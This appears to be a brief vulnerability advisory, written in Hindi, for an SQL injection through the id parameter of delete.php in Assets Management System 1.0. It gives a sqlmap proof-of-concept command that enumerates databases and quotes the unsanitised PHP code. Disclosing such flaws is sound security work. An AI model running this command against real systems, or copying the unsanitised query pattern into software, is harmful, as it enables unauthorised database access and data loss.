
एसेट्स मैनेजमेंट सिस्टम 1.0 delete.php में id पैरामीटर के माध्यम से SQL injection के लिए संवेदनशील है।
विवरण
Assets Management System 1.0 SQL इंजेक्शन के लिए कमजोर है id पैरामीटर के माध्यम से delete.php में
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

कोड समीक्षा (delete.php)
<?php include 'core/init.php';
$id = $_GET['id'];
delete_data($con,$id);
header('location:home.php');
$id वेरिएबल की कोई मान्यता या स्वच्छता नहीं है। इसका मतलब है कि उपयोगकर्ता द्वारा id पैरामीटर के रूप में प्रदान किया गया कोई भी मान, सीधे SQL क्वेरी में उपयोग किया जाएगा।